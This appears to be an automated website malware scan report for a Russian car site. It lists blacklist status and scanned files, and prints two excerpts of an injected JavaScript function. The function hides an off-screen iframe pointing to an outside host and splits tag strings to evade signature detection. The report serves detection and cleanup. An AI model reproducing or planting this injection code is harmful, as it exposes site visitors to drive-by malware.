Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dasautos.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dasautos.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
|---|---|---|
| http://www.dasautos.ru/ | 200 OK; Content-Length: 53128; Content-Type: text/html | clean |
| http://www.dasautos.ru/media/system/js/caption.js | 200 OK; Content-Length: 2636; Content-Type: application/javascript | clean |
| http://www.dasautos.ru/templates/emma_smooth/js/s5_effects.js | 200 OK; Content-Length: 3941; Content-Type: application/javascript | malicious |
| http://www.dasautos.ru/templates/emma_smooth/js/s5_cookies.js | 200 OK; Content-Length: 3546; Content-Type: application/javascript | malicious |
| http://userapi.com/js/api/openapi.js?52 | 200 OK; Content-Length: 64013; Content-Type: application/x-javascript | clean |
| http://www.dasautos.ru//templates/emma_smooth/js/s5_scroll_down_no_moo_menu.js/ | 404 Not Found; Content-Length: 318; Content-Type: text/html | clean |
| http://www.dasautos.ru/test404page.js | 404 Not Found; Content-Length: 277; Content-Type: text/html | clean |
| http://www.dasautos.ru//templates/emma_smooth/js/s5_textmenu.js/ | 404 Not Found; Content-Length: 303; Content-Type: text/html | clean |

Malicious code in http://www.dasautos.ru/templates/emma_smooth/js/s5_effects.js - confirmed by antiviruses (see below). The same function has been prepended to two of the template's legitimate script files; it checks the visitor's user agent and, only for browsers it does not exclude, writes a hidden iframe positioned off-screen (left/top -849px), with the HTML tag names split by string concatenation so that simple signature matching on `<iframe` does not fire. The excerpt is truncated where the scanner cut it (the call `Argisuliterk` runs straight into the original file's code):

    function Argisuliterkas() {
        var dude = navigator.userAgent;
        var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
        if (!unificas) {
            document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
        }
    }
    Argisuliterk
    s5_main_column_height = document.getElementById("s5_content_area").offsetHeight;
    s5_right_column_inner_height = document.getElementById("s5_right_column_inner").offsetHeight;
    s5_main_column_inner_height = document.getElementById("s5_content_area_inner").offsetHeight;
    } } } }
    var s5_body_Interval = 0;
    s5_body_Interval = window.setInterval("s5_set_body_height()",200);

Antivirus reports:

Malicious code in http://www.dasautos.ru/templates/emma_smooth/js/s5_cookies.js - confirmed by antiviruses (see below). This is the same injected function, again truncated by the scanner where it merges with the file's original cookie-panel code:

    function Argisuliterkas() {
        var dude = navigator.userAgent;
        var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
        if (!unificas) {
            document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
        }
    }
    Argisuliterk
    visitordatapanel.visits++;
    visitordatapanel.store();
    }
    function load_valuepanel() {
        if (!visitordatapanel.load() || !visitordatapanel.panel_holder) {
            document.s5_panelform.panel_holder.value = visitordatapanel.panel_holder;
        } else {
            document.s5_panelform.panel_holder.value = visitordatapanel.panel_holder;
        }
    }

Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dasautos.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: dasautos.ru
Referer: http://www.google.com/search?q=dasautos.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.